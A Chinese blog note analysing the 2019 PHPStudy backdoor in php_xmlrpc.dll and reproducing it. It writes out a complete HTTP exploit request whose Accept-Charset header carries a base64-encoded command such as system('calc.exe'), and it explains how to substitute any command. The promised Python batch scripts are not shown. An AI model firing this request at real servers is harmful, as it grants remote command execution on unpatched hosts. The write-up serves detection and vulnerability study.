PHPStudy後門分析+復現 & 附批量Py腳本

• 2019 年 10 月 7 日
• 筆記

phpstudy簡介

Phpstudy是一款PHP調試環境的程序集成包，集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款軟件一次性安裝，無需配置，即裝即用。由於其免費且方便的特性，在國內有着近百萬的PHP語言學習者、開發者用戶。

後門名稱：Phpstudy後門

威脅等級：嚴重

影響範圍：Phpstudy 2016、phpstudy2018

後門類型：C&C、命令執行

利用難度：極易

影響範圍

目前已知受影響的phpstudy版本：

· Phpstudy 2016版php-5.4

· Phpstudy 2018版php-5.2.17

· Phpstudy 2018版php-5.4.45

隱藏後門分析

通過分析，後門代碼存在於extphp_xmlrpc.dll模塊中，至少有2個版本：

用戶可以通過搜索php_xmlrpc.dll模塊中包含「@eval」關鍵字快速判斷是否是存在後門的版本，命令參考：

findstr /m /s /c:"@eval" *.* Jaky，公眾號：洛米唯熊phpStudy隱藏後門預警

以上後門分析轉自洛米唯熊

隱藏後門復現

就在昨晚，大佬就在朋友圈分享了phpstudy後門的exp

而我自己的phpstudy是很久以前就安裝在電腦的2018版本

那麼我們就來看看，這個exp能否復現成功呢？

EXP如下:

GET /1.php HTTP/1.1  Host: secquan.org  Cache-Control: max-age=0  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  Accept-Language: zh-CN,zh;q=0.9  Accept-Encoding:gzip,deflate  Accept-Charset:這裡就是要執行的命令base64加密c3lzdGVtKCdjYWxjLmV4ZScpOw==  Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282  Connection: close

Accept-Charset 地方就是我們exp的核心，如果想要執行其他命令，直接去把命令進行base64編碼即可！

那我們來打開我們的18版的phpstudy

我的配置情況:PHP 5.4.45 + Apache

接下來打開神器burpsuite開始抓包復現就可以了

把exp寫上去後，我們再將phpinfo();進行base64編碼然後進行測試

Phpinfo();=cGhwaW5mbyUyOCUyOSUzQg==

點擊GO

成功的復現了這個漏洞，所以phpstudy的2018和2016版本，是可以成功復現他的後門的

文章到這裡就結束了嗎？不，並沒有。

因為我要在這裡分享兩個poc:一個是批量檢測的poc，另一個是漏洞復現的poc

Poc如下:

這是批量檢測的py

這個是漏洞復現的py